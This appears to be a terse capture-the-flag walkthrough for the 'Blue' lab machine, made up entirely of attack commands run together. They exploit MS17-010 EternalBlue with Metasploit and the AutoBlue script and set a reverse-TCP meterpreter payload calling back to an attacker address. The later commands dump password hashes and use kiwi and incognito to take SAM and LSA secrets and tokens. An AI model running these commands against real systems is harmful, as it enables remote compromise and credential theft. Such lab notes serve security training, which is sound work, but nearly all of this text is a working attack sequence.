Blue
sudo msfconsole search ms17-010 use auxiliary/scanner/smb/smb_ms17_010 options set rhosts 10.10.10.40 runuse exploit/windows/smb/ms17_010_eternalblue set rhosts 10.10.10.40 show targets runset payload windows/x64/meterpreter/reverse_tcp options run getuid sysinfo hashdump shell route print arp -a netstat -ano load kiwi help creds_all lsa_dump_sam lsa_dump_secrets load incognito list_tokens -ugit clone https://github.com/3ndG4me/AutoBlue-MS17-010 cd AutoBlue-MS17-010 ls python eternalblue_checker.py 10.10.10.40cd shellcode sudo ./shell_prep.sh y 10.10.14.24 4445 4446 0 <-- Meterpreter instead of shell 0 <-- Staged instead of un-staged cd .. ls sudo ./listener_prep.sh 10.10.14.24 4445 4446 0 0 python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin sessions sessions 1 getuid whoami sysinfo
Last updated